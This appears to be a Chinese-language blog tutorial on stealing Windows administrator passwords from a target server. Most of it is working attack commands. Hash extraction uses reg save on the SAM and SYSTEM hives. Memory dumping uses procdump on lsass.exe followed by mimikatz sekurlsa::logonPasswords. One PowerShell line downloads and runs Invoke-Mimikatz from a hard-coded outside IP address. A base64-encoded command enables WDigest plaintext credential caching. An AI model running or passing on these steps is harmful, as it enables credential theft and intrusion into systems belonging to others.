内存中获取管理员明文密码
注册表导出hash解密
导出sam.hiv
文件:
1 | reg save hklm\sam C:\wwwroot\sam.hiv |
导出sys.hiv
文件:
1 | reg save hklm\system C:\wwwroot\sys.hiv |
下载这两个文件,放到mimikatz
目录中:
双击启动mimikatz.exe
文件:
1 | log //生成日志文件 |
使用以下解码平台解密NTLM
:
由于我的密码是强密码,所有没有解密出来:
我用自己密码加密。可以看出,结果是正确的
内存中获取明文
需要满足两个条件:
- 用户登录过该系统
- 登陆后未被重启过
可以从内存中获取明文密码:
使用命令ver
查看版本:版本低于6.3
的可以从内存中获取明文密码:procdump获取内存文件
上传procdump
文件到目标服务器:
执行命令:1
C:/wwwroot/procdumpx64.exe -accepteula -ma lsass.exe C:/wwwroot/lsass.dmp
下载lsass.dmp
到mimikatz
目录中:
执行以下命令:然后查看日志文件1
2
3log
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords fullmimikatz.log
:
可以看到已经拿到了明文密码任务管理器导出内存文件
从任务管理器中找到lsass.exe
进程:
右键-创建转储文件
拿到lsass.DMP
文件后还是使用mimiktz
的命令即可:
1 | log |
Powershell+mimikatz
上传Invoke-Mimikatz.ps1
到目标服务器
使用以下命令直接获取明文密码:
1 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://139.155.236.39/Invoke-Mimikatz.ps1'); Invoke-Mimikatz" |
明文密码在这儿:
Mimikatz直接读取
上传mimikatz_x64
文件到目标服务器上:
直接运行即可得到明文密码:
无法从内存中获取明文密码
修改注册表
执行以下命令:
1 | Powershell -ENC dAByAHkAIAB7ACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB2AGkAZABlAHIAcwBcAFcARABpAGcAZQBzAHQAIAAtAE4AYQBtAGUAIABVAHMAZQBMAG8AZwBvAG4AQwByAGUAZABlAG4AdABpAGEAbAAgAC0AVAB5AHAAZQAgAEQAVwBPAFIARAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwB0AG8AcAAgAH0AYwBhAHQAYwBoACAAewAgAH0A |
重启服务器后使用以上操作就可以在内存中获取明文密码了